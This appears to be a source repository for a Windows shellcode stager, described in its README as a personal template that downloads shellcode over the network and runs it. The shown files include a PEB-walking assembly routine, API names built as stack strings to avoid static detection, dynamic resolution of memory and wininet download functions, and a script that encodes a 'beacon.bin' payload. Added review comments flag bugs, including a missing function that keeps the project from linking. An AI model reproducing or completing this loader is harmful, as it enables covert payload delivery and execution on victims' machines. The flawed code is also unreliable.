├── README.md
├── stager
├── getProcAdddress.asm
├── BinToStr.py
├── Init.h
├── stager.vcxproj.filters
├── Function.cpp
├── Function.h
├── Init.cpp
├── stager.vcxproj
└── stager.cpp
├── stager.sln
├── .gitattributes
└── .gitignore
/README.md:
--------------------------------------------------------------------------------
1 | # ShellcodeLoader_stager
2 | 自用ShellcodeLoader模板,通过网络获取shellcode并执行。
3 |
--------------------------------------------------------------------------------
/stager/getProcAdddress.asm:
--------------------------------------------------------------------------------
1 |
; getKernel32 — returns in RAX the DllBase of the THIRD module in the loader's
; InInitializationOrderModuleList.  The offsets mirror the commented-out C
; version of getKernel32() in stager.cpp (PEB +0x18 = Ldr, Ldr +0x30 =
; InInitializationOrderModuleList, entry +0x10 = DllBase).
;
; NOTE(review): the function name assumes the third entry is kernel32.dll.
; That ordering is an observed property of specific Windows builds, not a
; contract, so this is fragile across OS versions.  A raw gs:[60h] read followed
; by this chain of loads is also one of the most widely signatured loader idioms
; in static analysis.
.code
getKernel32 proc
    mov rax,gs:[60h]            ; TEB -> PEB pointer (gs:[0x60] on x64)
    mov rax,[rax+18h]           ; PEB -> Ldr (PEB_LDR_DATA)
    mov rax,[rax+30h]           ; Ldr -> InInitializationOrderModuleList.Flink (1st entry)
    mov rax,[rax]               ; -> 2nd entry
    mov rax,[rax]               ; -> 3rd entry
    mov rax,[rax+10h]           ; entry -> DllBase (offset relative to the init-order links)
    ret
getKernel32 endp
end
--------------------------------------------------------------------------------
/stager/BinToStr.py:
--------------------------------------------------------------------------------
1 | import binascii
2 |
3 | # 读取二进制文本并显示为16进制
def readBinfile(binFile_path: str) -> None:
    """Hex-encode a binary file, print the reversed hex string, and save it.

    The file at ``binFile_path`` is read byte by byte, each byte is rendered as
    two upper-case hex digits, and the whole digit string is then reversed
    (character-wise, so nibble order is reversed too).  The reversed string is
    echoed to stdout (after a leading blank line) and written to ``shell.txt``
    in the current working directory.

    Args:
        binFile_path: path of the binary file to encode.
    """
    print()
    hex_digits = ""
    with open(binFile_path, 'rb') as f:
        # iter() with a b"" sentinel stops exactly where f.read(1) returns EOF.
        for chunk in iter(lambda: f.read(1), b""):
            hex_digits += binascii.b2a_hex(chunk).decode().upper()
    reversed_hex = hex_digits[::-1]
    print(reversed_hex)
    out_name = 'shell.txt'
    with open(out_name, 'w') as file:
        file.write(reversed_hex)
21 |
22 |
23 | readBinfile('beacon.bin')
24 |
--------------------------------------------------------------------------------
/stager/Init.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | //#include "struct.h"
3 | #include "Function.h"
4 |
5 |
// Holds the API function pointers the stager resolves at runtime.
//
// Lifecycle: GetInstance() lazily allocates the single instance with
// `new Init()`; because the class has no user-declared constructor that
// value-initialises every member, so all fn_* pointers are null until
// FindFuncionAddr() fills them (see Init.cpp).  Nothing here checks for a
// failed resolution, so callers dereference whatever FindFuncionAddr() stored.
class Init
{

public:
    // Process-wide singleton storage (see GetInstance()).
    static Init* myInit;

    // kernel32 exports, resolved by name in FindFuncionAddr().
    FN_GetProcAddress fn_GetProcAddress;
    FN_LoadLibraryW fn_LoadLibraryW;
    FN_LoadLibraryA fn_LoadLibraryA;          // NOTE(review): never assigned in FindFuncionAddr()
    FM_VirtualAlloc fn_VirtualAlloc;
    FM_VirtualProtect fn_VirtualProtect;

    // wininet.dll exports, resolved the same way (HINTERNET handles are typed
    // as LPVOID in Function.h).
    Fn_InternetOpenA fn_InternetOpenA;
    Fn_InternetConnectA fn_InternetConnectA;
    Fn_HttpOpenRequestA fn_HttpOpenRequestA;
    Fn_HttpSendRequestW fn_HttpSendRequestW;
    Fn_InternetQueryOptionW fn_InternetQueryOptionW;
    Fn_InternetSetOptionW fn_InternetSetOptionW;
    Fn_InternetReadFile fn_InternetReadFile;
    Fn_InternetCloseHandle fn_InternetCloseHandle;

public:
    // Returns the singleton, creating it on first call (not synchronised).
    static Init* GetInstance();
    // Populates every fn_* member above; see Init.cpp for the resolution chain.
    void FindFuncionAddr();

private:

};
34 |
35 |
--------------------------------------------------------------------------------
/stager.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.1.32421.90
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "stager", "stager\stager.vcxproj", "{FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Debug|x64.ActiveCfg = Debug|x64
17 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Debug|x64.Build.0 = Debug|x64
18 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Debug|x86.ActiveCfg = Debug|Win32
19 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Debug|x86.Build.0 = Debug|Win32
20 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Release|x64.ActiveCfg = Release|x64
21 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Release|x64.Build.0 = Release|x64
22 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Release|x86.ActiveCfg = Release|Win32
23 | {FCE9A4B4-BE8C-4E90-8B8C-09C4C42F6041}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {4FBEB2EC-CCD0-4763-8841-C74AF44207A6}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/stager/stager.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 | 源文件
23 |
24 |
25 | 源文件
26 |
27 |
28 |
29 |
30 | 头文件
31 |
32 |
33 | 头文件
34 |
35 |
36 |
37 |
38 | 源文件
39 |
40 |
41 |
--------------------------------------------------------------------------------
/stager/Function.cpp:
--------------------------------------------------------------------------------
1 | #include "Function.h"
2 |
3 | //FARPROC getProcAddress(HMODULE hModuleBase)
4 | //{
5 | // PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase;
6 | // PIMAGE_NT_HEADERS64 lpNtHeader = (PIMAGE_NT_HEADERS64)((ULONG64)hModuleBase + lpDosHeader->e_lfanew);
7 | // if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) {
8 | // return NULL;
9 | // }
10 | // if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {
11 | // return NULL;
12 | // }
13 | // PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((ULONG64)hModuleBase + (ULONG64)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
14 | // PDWORD lpdwFunName = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNames);
15 | // PWORD lpword = (PWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNameOrdinals);
16 | // PDWORD lpdwFunAddr = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfFunctions);
17 | //
18 | // DWORD dwLoop = 0;
19 | // FARPROC pRet = NULL;
20 | // for (; dwLoop <= lpExports->NumberOfNames - 1; dwLoop++) {
21 | // char* pFunName = (char*)(lpdwFunName[dwLoop] + (ULONG64)hModuleBase);
22 | //
23 | // if (pFunName[0] == 'G' &&
24 | // pFunName[1] == 'e' &&
25 | // pFunName[2] == 't' &&
26 | // pFunName[3] == 'P' &&
27 | // pFunName[4] == 'r' &&
28 | // pFunName[5] == 'o' &&
29 | // pFunName[6] == 'c' &&
30 | // pFunName[7] == 'A' &&
31 | // pFunName[8] == 'd' &&
32 | // pFunName[9] == 'd' &&
33 | // pFunName[10] == 'r' &&
34 | // pFunName[11] == 'e' &&
35 | // pFunName[12] == 's' &&
36 | // pFunName[13] == 's')
37 | // {
38 | // pRet = (FARPROC)(lpdwFunAddr[lpword[dwLoop]] + (ULONG64)hModuleBase);
39 | // break;
40 | // }
41 | // }
42 | // return pRet;
43 | //}
44 |
--------------------------------------------------------------------------------
/stager/Function.h:
--------------------------------------------------------------------------------
#pragma once
// NOTE(review): the #include target below was lost in rendering; the types and
// SAL annotations used in these typedefs (FARPROC, HMODULE, _In_, ...) come
// from the Windows SDK headers.
#include

// Function-pointer types for the kernel32 exports the stager resolves at
// runtime (see Init::FindFuncionAddr in Init.cpp).  Naming is inconsistent:
// "FN_" for the first three, "FM_" for the two memory APIs.
typedef FARPROC(WINAPI* FN_GetProcAddress)(_In_ HMODULE hModule,_In_ LPCSTR lpProcName);
typedef HMODULE(WINAPI* FN_LoadLibraryW)(_In_ LPCWSTR lpLibFileName);
typedef HMODULE(WINAPI* FN_LoadLibraryA)(_In_ LPCSTR lpLibFileName);
typedef BOOL(WINAPI* FM_VirtualProtect)(_In_ LPVOID lpAddress,_In_ SIZE_T dwSize,_In_ DWORD flNewProtect,_Out_ PDWORD lpflOldProtect);
typedef PVOID(WINAPI*FM_VirtualAlloc)( _In_opt_ LPVOID lpAddress, _In_ SIZE_T dwSize,_In_ DWORD flAllocationType, _In_ DWORD flProtect);

// Function-pointer types for the wininet.dll exports.  HINTERNET handles are
// declared as plain LPVOID here.  These use `_stdcall` where the kernel32 ones
// above use WINAPI; on the x64 target of this project calling-convention
// keywords are ignored by MSVC, so the difference is cosmetic there.
typedef LPVOID(_stdcall* Fn_InternetOpenA)(_In_opt_ LPCSTR lpszAgent,_In_ DWORD dwAccessType,_In_opt_ LPCSTR lpszProxy,_In_opt_ LPCSTR lpszProxyBypass,_In_ DWORD dwFlags);
typedef LPVOID(_stdcall* Fn_InternetConnectA)(_In_ LPVOID hInternet,_In_ LPCSTR lpszServerName,_In_ WORD nServerPort,_In_opt_ LPCSTR lpszUserName,_In_opt_ LPCSTR lpszPassword,_In_ DWORD dwService,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);
typedef LPVOID(_stdcall* Fn_HttpOpenRequestA)(_In_ LPVOID hConnect,_In_opt_ LPCSTR lpszVerb,_In_opt_ LPCSTR lpszObjectName,_In_opt_ LPCSTR lpszVersion,_In_opt_ LPCSTR lpszReferrer,_In_opt_z_ LPCSTR FAR* lplpszAcceptTypes,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);
typedef BOOL (_stdcall* Fn_HttpSendRequestW)(_In_ LPVOID hRequest,_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,_In_ DWORD dwHeadersLength,_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,_In_ DWORD dwOptionalLength);
typedef BOOL (_stdcall* Fn_InternetQueryOptionW)(_In_opt_ LPVOID hInternet,_In_ DWORD dwOption,_Out_writes_bytes_to_opt_(*lpdwBufferLength, *lpdwBufferLength) __out_data_source(NETWORK) LPVOID lpBuffer,_Inout_ LPDWORD lpdwBufferLength);
typedef BOOL (_stdcall* Fn_InternetSetOptionW)(_In_opt_ LPVOID hInternet,_In_ DWORD dwOption,_In_opt_ LPVOID lpBuffer,_In_ DWORD dwBufferLength);
// NOTE(review): duplicate of the Fn_HttpSendRequestW typedef a few lines up.
// An identical typedef redeclaration is legal C++, so this compiles, but it is
// redundant.
typedef BOOL(_stdcall* Fn_HttpSendRequestW)(_In_ LPVOID hRequest,_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,_In_ DWORD dwHeadersLength,_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,_In_ DWORD dwOptionalLength);
typedef BOOL (_stdcall* Fn_InternetReadFile)(_In_ LPVOID hFile,_Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,_In_ DWORD dwNumberOfBytesToRead,_Out_ LPDWORD lpdwNumberOfBytesRead);
typedef BOOL (_stdcall* Fn_InternetCloseHandle)(_In_ LPVOID hInternet);
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
# This is needed for earlier builds of msysgit that do not have it on by
# default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/stager/Init.cpp:
--------------------------------------------------------------------------------
1 | #include "Init.h"
2 |
// Bootstrap helpers used by Init::FindFuncionAddr().
//
// NOTE(review): the only definition of getProcAddress() in this repository is
// the commented-out one in Function.cpp, so the project as shown will not link.
FARPROC getProcAddress(HMODULE hModuleBase);
// Implemented in getProcAdddress.asm (MASM); returns the DllBase of the third
// entry in the PEB's InInitializationOrderModuleList, assumed to be kernel32.
extern "C" PVOID64 getKernel32();

// Singleton storage; allocated lazily by Init::GetInstance().
Init* Init::myInit = nullptr;
7 |
// Returns the process-wide Init instance, allocating it on first use.
// No synchronisation: concurrent first calls could each allocate an instance.
Init* Init::GetInstance()
{
    // Fast path: the instance already exists.
    if (myInit)
    {
        return myInit;
    }
    // Slow path: create it.  `new Init()` value-initialises, so every fn_*
    // member starts out null until FindFuncionAddr() runs.
    myInit = new Init();
    return myInit;
}
16 |
// Resolves every API the stager uses at runtime and stores the pointers in the
// singleton's fn_* members.
//
// Resolution chain (all visible in this file):
//   getKernel32()        -> kernel32 base via the PEB walk in getProcAdddress.asm
//   getProcAddress(base) -> address of GetProcAddress (declared above)
//   fn_GetProcAddress    -> every other export, looked up by name
//
// API and DLL names are assembled from local char arrays rather than string
// literals (stack strings), presumably to keep them out of the binary's string
// table; for defenders this pattern is itself a well-known static indicator.
//
// NOTE(review): no resolved pointer or module handle is null-checked; a failed
// lookup is dereferenced by the next line that uses it.
void Init::FindFuncionAddr()
{
    // kernel32 export names.
    char xyLoadLibraryW[] = { 'L','o','a','d','L','i','b','r','a','r','y','W',0 };
    char xyLoadLibraryA[] = { 'L','o','a','d','L','i','b','r','a','r','y','A',0 };
    char xy_Virtualalloc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c',0 };
    char xy_VirtualProtectC[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t',0 };
    char xy_VirtualallocEx[] = { 'V','i','r','t','u','a','l','A','l','l','o','c','E','x',0 };   // unused: never resolved below

    // wininet.dll and its export names.
    char xy_Wininet[] = { 'W','i','n','i','n','e','t','.','d','l','l',0 };
    char xy_InternetOpenA[] = { 'I','n','t','e','r','n','e','t','O','p','e','n','A',0 };
    char xy_HttpSendRequestW[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','W',0 };
    char xy_InternetQueryOptionW[] = { 'I','n','t','e','r','n','e','t','Q','u','e','r','y','O','p','t','i','o','n','W',0 };
    char InternetSetOptionW[] = { 'I','n','t','e','r','n','e','t','S','e','t','O','p','t','i','o','n','W',0 };   // style: only name without the xy_ prefix
    char xy_InternetReadFile[] = { 'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e',0 };
    char xy_InternetConnectA[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','A',0 };
    char xy_HttpOpenRequestA[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','A',0 };
    char xy_InternetCloseHandle[] = { 'I','n','t','e','r','n','e','t','C','l','o','s','e','H','a','n','d','l','e',0 };

    // Bootstrap: GetProcAddress itself comes from the hand-rolled export walk.
    Init::fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());
    Init::fn_LoadLibraryW = (FN_LoadLibraryW)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryW);
    // NOTE(review): this second store overwrites fn_LoadLibraryW with the
    // LoadLibraryA export's address; fn_LoadLibraryA itself is never assigned.
    Init::fn_LoadLibraryW = (FN_LoadLibraryW)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryA);
    Init::fn_VirtualAlloc = (FM_VirtualAlloc)fn_GetProcAddress((HMODULE)getKernel32(), xy_Virtualalloc);
    Init::fn_VirtualProtect = (FM_VirtualProtect)fn_GetProcAddress((HMODULE)getKernel32(), xy_VirtualProtectC);

    // Each line below calls fn_LoadLibraryW again with the 8-bit "Wininet.dll"
    // array cast to LPCWSTR (eight separate load calls for the same module);
    // the returned handle is passed straight to fn_GetProcAddress unchecked.
    Init::fn_InternetOpenA = (Fn_InternetOpenA)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetOpenA);
    Init::fn_HttpSendRequestW = (Fn_HttpSendRequestW)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_HttpSendRequestW);
    Init::fn_InternetQueryOptionW = (Fn_InternetQueryOptionW)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetQueryOptionW);
    Init::fn_InternetSetOptionW = (Fn_InternetSetOptionW)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), InternetSetOptionW);
    Init::fn_InternetReadFile = (Fn_InternetReadFile)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetReadFile);
    Init::fn_InternetConnectA = (Fn_InternetConnectA)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetConnectA);
    Init::fn_HttpOpenRequestA = (Fn_HttpOpenRequestA)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_HttpOpenRequestA);
    Init::fn_InternetCloseHandle = (Fn_InternetCloseHandle)fn_GetProcAddress(fn_LoadLibraryW((LPCWSTR)xy_Wininet), xy_InternetCloseHandle);

}
51 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/stager/stager.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {fce9a4b4-be8c-4e90-8b8c-09c4c42f6041}
25 | stager
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
